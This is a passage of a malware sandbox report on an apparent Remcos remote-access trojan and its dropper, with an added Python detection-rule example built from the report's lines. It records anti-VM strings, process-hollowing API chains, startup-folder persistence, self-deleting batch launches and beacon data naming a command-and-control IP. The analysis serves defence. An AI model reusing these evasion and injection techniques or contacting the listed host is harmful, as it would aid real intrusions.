                    Source: file.exe, 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp Binary or memory string: @HARDWARE\ACPI\DSDT\VBOX__PROCMON_WINDOW_CLASSPROCEXPL21invalid vector<T> subscript?datafmt WAVERIFF.wav%Y-%m-%d %H.%MFreeFrameGetFrameCloseCameraOpenCamera|dmc|[DataStart]%02i:%02i:%02i:%03i [INFO] KeepAlive Enabled! Timeout: %i seconds
                    Source: file.exe, 00000000.00000003.2126925157.0000000000737000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2142430073.000000000073E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2142430073.00000000006E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                    Source: SGS.exe, 00000005.00000002.2199326644.00000000006E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
                    Source: SGS.exe, 0000000C.00000002.2351272008.0000000000628000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                    Source: SGS.exe, 0000000C.00000002.2351272008.0000000000628000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
                    Source: SGS.exe, 0000000C.00000002.2351272008.0000000000628000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\yF
                    Source: file.exe, 00000003.00000002.4505309464.00000000004F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
                    Source: file.exe, 00000009.00000003.2304232651.00000000008C5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: SGS.exe, 00000005.00000002.2199326644.00000000006E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\yJ
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe API call chain: ExitProcess graph end node graph_5-8621
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe API call chain: ExitProcess graph end node graph_5-8476
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe Code function: 5_2_00410065 GetTickCount,wsprintfA,GetModuleFileNameA,GetTempPathA,lstrcat,ExitProcess,CreateFileA,lstrcpy,StrRChrIA,lstrcpy,ExitProcess,lstrlen,CloseHandle,wsprintfA,LoadLibraryA,GetProcAddress,ShellExecuteA,5_2_00410065
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe Code function: 5_2_0040F984 mov eax, dword ptr fs:[00000030h] 5_2_0040F984
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Code function: 11_2_004011A3 mov eax, dword ptr fs:[00000030h] 11_2_004011A3
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe Code function: 5_2_004105D6 SetUnhandledExceptionFilter,RevertToSelf,5_2_004105D6

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Code function: 11_2_0040EDE9 __EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,11_2_0040EDE9
                    Source: C:\Users\user\Desktop\file.exe Memory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe Memory written: C:\Users\user\AppData\Local\Temp\SGS.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Memory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe Memory written: C:\Users\user\AppData\Local\Temp\SGS.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: GetCurrentProcessId,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenMutexA,CloseHandle,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenProcess,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z,GetModuleHandleA,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,Sleep,CloseHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, \svchost.exe11_2_00409B4E
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe Code function: 5_2_0041032D lstrcmpiA,LogonUserA,lstrlen,LCMapStringA,LogonUserA,LogonUserA,74701B10,ImpersonateLoggedOnUser,RevertToSelf,746F5030,CloseHandle,5_2_0041032D
                    Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\SGS.exe "C:\Users\user\AppData\Local\Temp\SGS.exe"
                    Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe Process created: C:\Users\user\AppData\Local\Temp\SGS.exe C:\Users\user\AppData\Local\Temp\SGS.exe
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5234062.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" "
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Process created: C:\Users\user\AppData\Local\Temp\SGS.exe "C:\Users\user\AppData\Local\Temp\SGS.exe"
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe Process created: C:\Users\user\AppData\Local\Temp\SGS.exe C:\Users\user\AppData\Local\Temp\SGS.exe
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5249171.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" "
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exe Code function: 5_2_004044D2 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,5_2_004044D2
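                    The evasion evidence above lends itself to simple triage rules over the report's own lines: the VBOX__/VMware/Hyper-V artifact strings, the `mov eax, fs:[30h]` PEB reads, the CreateProcessW -> WriteProcessMemory -> SetThreadContext -> ResumeThread chain (with an MZ header written at base 0x400000), and the `cmd.exe /c ""<Temp>\<digits>.bat" "<dropped exe>" "` self-deletion launches attributed to Pony Loader. The Python below is an added example written for this page, not Joe Sandbox code: the sample lines are copied from the evidence above (minus the Source column), and the rule names and the exact API subsequence used for hollowing are this example's own choices.

```python
import re

# Evidence lines copied from the sandbox report above (the "Source:" column is dropped
# for brevity); these are the inputs the rules below are exercised against.
REPORT_LINES = [
    r"Code function: 11_2_0040EDE9 __EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,11_2_0040EDE9",
    r"Code function: 5_2_00410065 GetTickCount,wsprintfA,GetModuleFileNameA,GetTempPathA,lstrcat,ExitProcess,CreateFileA,lstrcpy,StrRChrIA,lstrcpy,ExitProcess,lstrlen,CloseHandle,wsprintfA,LoadLibraryA,GetProcAddress,ShellExecuteA,5_2_00410065",
    r"Code function: 5_2_0040F984 mov eax, dword ptr fs:[00000030h]5_2_0040F984",
    r"Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__",
    r"Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll",
    r'Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5234062.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" "',
    r"Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe",
]

CODE_FUNC = re.compile(r"Code function:\s*(\S+)\s+(.*)$")
# Rule names and patterns below are this example's own labels, not Joe Sandbox signatures.
HOLLOWING_CHAIN = [r"CreateProcess[AW]?", r"WriteProcessMemory", r"SetThreadContext", r"ResumeThread"]
PEB_ACCESS = re.compile(r"fs:\[0*30h\]", re.I)  # TEB->PEB read (BeingDebugged, NtGlobalFlag, ...)
VM_ARTIFACTS = ("VBOX__", "VMware", "VirtualBox", "QEMU", "Hyper-V")
# Pony Loader self-deletion launch: cmd.exe /c ""<Temp>\<digits>.bat" "<dropped exe>" "
SELF_DELETE_BAT = re.compile(r'cmd\.exe /c ""[^"]*\\Temp\\\d+\.bat" "[^"]+\.exe" "', re.I)


def api_calls(line):
    """Return the comma-separated API list of a 'Code function:' line, without the
    function id that the sandbox repeats as the last token."""
    m = CODE_FUNC.search(line)
    if not m:
        return []
    func_id, body = m.groups()
    calls = [c.strip() for c in body.split(",") if c.strip()]
    return [c for c in calls if c != func_id]


def has_ordered_subsequence(calls, pattern):
    """True if every regex in `pattern` matches some call, in the given order;
    other calls may sit in between (e.g. the four WriteProcessMemory calls)."""
    it = iter(calls)
    return all(any(re.fullmatch(p, c) for c in it) for p in pattern)


def scan(lines):
    """Run every rule over every line; returns (rule_name, line_index) pairs."""
    hits = []
    for i, line in enumerate(lines):
        calls = api_calls(line)
        if calls and has_ordered_subsequence(calls, HOLLOWING_CHAIN):
            hits.append(("process_hollowing_api_chain", i))
        if PEB_ACCESS.search(line):
            hits.append(("peb_access_fs30", i))
        # "Hyper-V RAW" is the name of a Winsock provider shipped with stock Windows 10,
        # so on its own it is a weak VM indicator; the VBOX__/VMware device strings are not.
        if any(tag.lower() in line.lower() for tag in VM_ARTIFACTS):
            hits.append(("vm_artifact_string", i))
        if SELF_DELETE_BAT.search(line):
            hits.append(("pony_self_delete_batch", i))
    return hits


if __name__ == "__main__":
    for rule, idx in scan(REPORT_LINES):
        print(f"{rule:30s} line {idx}: {REPORT_LINES[idx][:80]}")
```

                    The ordered-subsequence match is what keeps the hollowing rule from firing on the many benign functions that merely import CreateProcess and WriteProcessMemory; requiring SetThreadContext followed by ResumeThread after the writes is the part that distinguishes hollowing from a plain child launch.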
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1 (64 bit)|cmd||cmd|8589148160S
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: KRemoteHost|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0|cmd|C:\Users\user\Desktop\file.exe|cmd|Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz|cmd|-|GB|cmd|WiM
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|bit)|cmd||cmd|8589148160!
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0|cmd|C:\Users\user\Desktop\file.exet|cmd|6109
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0|cmd|C:\Users\user\Desktop\file.exe|cmd|Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz|cmd|
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0|cmd|C:\Users\user\Desktop\file.exe|cmd|Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\#
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Managert|cmd|C:\Users\alfo
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: KRemoteHost|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|122|cmd|1791967422|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0|cmd|C:\Users\user\Desktop\file.exe|cmd|Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz|cmd|-
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0|cmd|C:\Users\user\Desktop\file.exe|cmd||6109e
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|148160
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd||cmd|GB|cmd|Windows 10 Enterpr
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|e|cmd||cmd||cmd|8589148160
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager3i [INFO]
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0|cmd|C:\Users\user\Desktop\file.exe|cmd|Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz|cmd|-
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manageranager
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manageri [INFO]r
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0|cmd|t|cmd|6109
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Mise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|122|cmd|1791967422|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0|cmd|C:\Users\user\Desktop\file.exe|cmd|Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz|cmd|-Host|cmd|610930/alfo
                    Source: logs.dat.3.dr Binary or memory string: [ Program Manager ]
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manageri [INFO] J#!
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|8589148160
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1d|GB|cmd|Wiu
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3i [INFO] #
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3i [INFO] r
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerfonsr
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|109G
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_00411005 cpuid 11_2_00411005
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,5_2_004045FD
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,11_2_004093B5
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_0040FC69 __EH_prolog,GdiplusStartup,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,CreateDirectoryW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,Sleep,GetLocalTime,swprintf,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,Sleep,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,11_2_0040FC69
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_0041051E OleInitialize,GetUserNameA,5_2_0041051E
